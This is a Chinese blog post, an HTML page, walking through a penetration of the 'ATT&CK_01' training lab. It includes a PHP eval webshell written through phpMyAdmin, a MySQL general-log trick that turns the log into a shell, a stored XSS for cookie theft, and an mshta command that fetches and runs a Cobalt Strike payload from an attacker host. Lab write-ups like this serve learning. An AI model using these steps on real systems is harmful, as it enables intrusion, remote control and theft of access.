<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>ATT&amp;CK_01靶场学习 | greetdawn&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="环境配置靶场环境部署时，win7虚机需要进入系统手动开启一下phpstudy，且关闭防火墙。 综合渗透信息收集查看本机地址段，使用netdiscover发现同段存活主机 netdiscover -i eth0 -r 192.168.49.0&#x2F;24   使用nmap扫描目前主机端口开放情况 nmap -T4 -A -v -sS 192.168.49.129   站点目录扫描 python3">
<meta property="og:type" content="article">
<meta property="og:title" content="ATT&amp;CK_01靶场学习">
<meta property="og:url" content="http://www.greetdawn.top/2021/10/27/%E7%BB%BC%E5%90%88%E6%B8%97%E9%80%8F/ATT-CK-01/index.html">
<meta property="og:site_name" content="greetdawn&#39;s Blog">
<meta property="og:description" content="环境配置靶场环境部署时，win7虚机需要进入系统手动开启一下phpstudy，且关闭防火墙。 综合渗透信息收集查看本机地址段，使用netdiscover发现同段存活主机 netdiscover -i eth0 -r 192.168.49.0&#x2F;24   使用nmap扫描目前主机端口开放情况 nmap -T4 -A -v -sS 192.168.49.129   站点目录扫描 python3">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211027165007738.png">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211027165746145.png">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211028110507409.png">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211028134039225.png">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211027172141356.png">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211027172342830.png">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211027172655912.png">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211028140613746.png">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211028141427018.png">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211028141605979.png">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211028103301810.png">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211028104449312.png">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211028110034370.png">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211028144122563.png">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211122153614191.png">
<meta property="article:published_time" content="2021-10-27T05:56:27.000Z">
<meta property="article:modified_time" content="2021-11-22T10:29:34.138Z">
<meta property="article:author" content="丨greetdawn丨">
<meta property="article:tag" content="内网渗透">
<meta property="article:tag" content="红日靶场">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211027165007738.png">
  
  
    <link rel="icon" href="/favicon.png">
  
  <link type="text/css" href="//netdna.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.css" rel="stylesheet">
  
<link rel="stylesheet" href="/css/style.css">

  
<link rel="stylesheet" href="/css/scrollUp/image.css">

  <!--[if lt IE 9]><script src="//cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7/html5shiv.min.js"></script><![endif]-->
  
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="greetdawn's Blog" type="application/atom+xml">
</head>
<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <div class="logo">
        <img src="/logo.png" alt="Profile Picture">
      </div>
      <div id="title">greetdawn's Blog</div>
      
        <div id="subtitle">The God love people</div>
      
       <ul class="my-socials">
  
 
</ul>
    </div>
  </div>
  <div id="header-inner" class="">
    <nav id="main-nav">
      <a id="main-nav-toggle" class="nav-icon"></a>
      <!--
        
          
            <a class="main-nav-link" href="/">首页</a>
          
            <a class="main-nav-link" href="/categories/life">生活</a>
          
            <a class="main-nav-link" href="/archives">归档</a>
          
        
      -->
    </nav>
    <nav id="title-nav" style="display:none">
      <a href="/">greetdawn&#39;s Blog</a>
      <img src="/logo.png" alt="Profile Picture">
      <!--
      <span id="title-nav-socials">
        
       
     </span>
      -->
    </nav>
    <nav id="sub-nav">
      
      <a id="nav-search-btn" class="nav-icon" title="Search"></a>
    </nav>
    <div id="search-form-wrap">
      <form action="http://www.baidu.com/baidu" method="get" accept-charset="utf-8" class="search-form">
        <input type="search" name="word" maxlength="20" class="search-form-input" placeholder="搜索">
        <input type="submit" value="" class="search-form-submit">
        <input name=tn type=hidden value="bds">
        <input name=cl type=hidden value="3">
        <input name=ct type=hidden value="2097152">
        <input type="hidden" name="si" value="www.greetdawn.top">
      </form>
    </div>
  </div>
  <div class="site-nav" style="display: none;">
    <ul>
      
      
        <li><a href="/">首页</a></li>
      
        <li><a href="/categories/life">生活</a></li>
      
        <li><a href="/archives">归档</a></li>
      
      
    </ul>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-综合渗透/ATT-CK-01" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2021/10/27/%E7%BB%BC%E5%90%88%E6%B8%97%E9%80%8F/ATT-CK-01/" class="article-date">
  <time datetime="2021-10-27T05:56:27.000Z" itemprop="datePublished">2021-10-27</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/">攻防渗透</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      ATT&amp;CK_01靶场学习
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h1><p>靶场环境部署时，<code>win7</code>虚机需要进入系统手动开启一下<code>phpstudy</code>，且关闭防火墙。</p>
<h1 id="综合渗透"><a href="#综合渗透" class="headerlink" title="综合渗透"></a>综合渗透</h1><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>查看本机地址段，使用<code>netdiscover</code>发现同段存活主机</p>
<pre class="language-none"><code class="language-none">netdiscover -i eth0 -r 192.168.49.0&#x2F;24</code></pre>

<p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211027165007738.png" alt="image-20211027165007738"></p>
<p>使用<code>nmap</code>扫描目前主机端口开放情况</p>
<pre class="language-none"><code class="language-none">nmap -T4 -A -v -sS 192.168.49.129</code></pre>

<p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211027165746145.png" alt="image-20211027165746145"></p>
<p>站点目录扫描</p>
<pre class="language-none"><code class="language-none">python3 dirsearch.py -u &quot;http:&#x2F;&#x2F;192.168.49.129&#x2F;&quot; -e php</code></pre>

<p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211028110507409.png" alt="image-20211028110507409"></p>
<p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211028134039225.png" alt="image-20211028134039225"></p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="phpmyadmin写日志getshell"><a href="#phpmyadmin写日志getshell" class="headerlink" title="phpmyadmin写日志getshell"></a>phpmyadmin写日志getshell</h3><p>web访问发现直接是<code>phpstudy</code>探针,通过探针测试出<code>mysql</code>存在弱口令<code>root/root</code></p>
<p>因为<code>phpstudy</code>存在<code>phpmyadmin</code>组件，直接利用<code>phpmyadmin</code>实现写<code>webshell</code>操作</p>
<pre class="language-none"><code class="language-none">select &#39;&lt;?php @eval($_POST[&quot;cmd&quot;])?&gt;&#39; into outfile &#39;C:&#x2F;phpStudy&#x2F;WWW&#x2F;shell.php&#39;</code></pre>

<p>但是开启了写文件限制</p>
<p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211027172141356.png" alt="image-20211027172141356"></p>
<p>但是这里可以尝试使用日志文件<code>getshell</code></p>
<p>首先查看日志状态</p>
<pre class="language-none"><code class="language-none">show variables  like  &#39;%general%&#39;; </code></pre>

<p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211027172342830.png" alt="image-20211027172342830"></p>
<p>当开启<code>general</code>时，所执行的<code>sql</code>语句都会出现在<code>stu1.log</code>文件中。那么，如果修改<code>generallogfile</code>的值，那么所执行的<code>sql</code>语句就会对应生成对应的文件中，进而<code>getshell</code>。</p>
<pre class="language-none"><code class="language-none">SET GLOBAL general_log&#x3D;&#39;on&#39;
set GLOBAL general_log_file&#x3D;&#39;C:&#x2F;phpStudy&#x2F;WWW&#x2F;shell.php&#39;</code></pre>

<p>再次执行含有<code>shell</code>的语句，请求发现写入成功</p>
<p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211027172655912.png" alt="image-20211027172655912"></p>
<h3 id="后台弱口令getshell"><a href="#后台弱口令getshell" class="headerlink" title="后台弱口令getshell"></a>后台弱口令getshell</h3><p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211028140613746.png" alt="image-20211028140613746"></p>
<p>根据备份站点文件获取完整路径信息</p>
<pre class="language-none"><code class="language-none">http:&#x2F;&#x2F;192.168.49.129&#x2F;yxcms&#x2F;protected&#x2F;apps&#x2F;default&#x2F;view&#x2F;default&#x2F;hack.php</code></pre>

<p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211028141427018.png" alt="image-20211028141427018"></p>
<h3 id="存储型XSS"><a href="#存储型XSS" class="headerlink" title="存储型XSS"></a>存储型XSS</h3><p>前台注册用户留言板插入,后台审核通过即可触发。</p>
<p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211028141605979.png" alt="image-20211028141605979"></p>
<p>在实际业务场景下，可以以次获取管理用户cookie，伪造登录</p>
<h2 id="主机上线"><a href="#主机上线" class="headerlink" title="主机上线"></a>主机上线</h2><h3 id="cs主机上线提权"><a href="#cs主机上线提权" class="headerlink" title="cs主机上线提权"></a>cs主机上线提权</h3><p>使用蚁剑成功连接<code>shell</code></p>
<p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211028103301810.png" alt="image-20211028103301810"></p>
<p>使用<code>cs html</code>上线主机，且是<code>administrator</code>权限。</p>
<pre class="language-none"><code class="language-none">mshta http:&#x2F;&#x2F;192.168.49.130:80&#x2F;download&#x2F;file.ext</code></pre>

<p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211028104449312.png" alt="image-20211028104449312"></p>
<p>使用<code>cs</code>内建提权码，成功提至管理员权限</p>
<p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211028110034370.png" alt="image-20211028110034370"></p>
<h3 id="主机信息收集"><a href="#主机信息收集" class="headerlink" title="主机信息收集"></a>主机信息收集</h3><p><code>shell ipconfig /all</code>获取内网主机网段为192.168.29.0/24 域为 <code>god.org</code></p>
<p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211028144122563.png" alt="image-20211028144122563"></p>
<p>查看域信息</p>
<p><code>shell net group /domain</code> </p>
<p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/image-20211122153614191.png" alt="image-20211122153614191"></p>
<p>上传<code>3389.bat</code>脚本开启3389端口 使用远程桌面进行连接</p>
<p>上传frp代理实现socks5内网穿透</p>

      
    </div>
    <footer class="article-footer">
      
        <a data-url="http://www.greetdawn.top/2021/10/27/%E7%BB%BC%E5%90%88%E6%B8%97%E9%80%8F/ATT-CK-01/" data-id="ckzqi7ikj0022ioum3coz3ive" class="article-share-link">分享到</a>
      

      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" rel="tag">内网渗透</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA/" rel="tag">红日靶场</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2021/11/24/wechat/newstart/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          重新开始
        
      </div>
    </a>
  
  
    <a href="/2021/10/26/vulfocus/shiro%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%EF%BC%88CVE-2020-1957%EF%BC%89/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">shiro权限绕过（CVE-2020-1957）</div>
    </a>
  
</nav>

  
</article>

</section>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2022 丨greetdawn丨<br>
      Theme <a href="https://github.com/henryhuang/oishi" target="_blank">Oishi</a>, Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <!--
      <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">首页</a>
  
    <a href="/categories/life" class="mobile-nav-link">生活</a>
  
    <a href="/archives" class="mobile-nav-link">归档</a>
  
</nav>
    -->
    

<!-- 百度分享 start -->

<!-- 百度分享 end -->

<script src="//cdn.bootcss.com/jquery/1.11.1/jquery.min.js"></script>




<script src="/js/jquery.scrollUp.min.js"></script>


<script src="/js/jquery.transform.js"></script>


<script src="/js/menu.js"></script>



<script src="/js/script.js"></script>


<script src="/js/scrollUp.js"></script>


  </div>
</body>
</html>